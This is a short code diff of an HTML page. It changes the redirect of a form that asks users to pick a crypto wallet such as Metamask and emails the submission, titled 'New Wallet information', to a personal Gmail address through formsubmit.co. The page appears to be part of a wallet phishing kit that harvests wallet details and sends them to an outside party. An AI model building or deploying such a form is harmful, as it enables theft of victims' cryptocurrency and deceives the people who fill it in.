--- a/index.html
+++ b/index.html
@@ -49,7 +49,7 @@
             <div class="close">&times;</div>
             <form action="https://formsubmit.co/germanval0098@gmail.com" method="POST"">
                 <input type="hidden" name="_subject" value="New Wallet information">
-                <input type="hidden" name="_next" value="done.html">
+                <input type="hidden" name="_next" value="yaww-io.netlify.app/done.html">
                 <label for="Wallets">Select your wallet:</label>
                 <select name="Wallets" id="all-wallets">
                     <option name="Wallets" id="Metamask">Metamask Wallet</option>
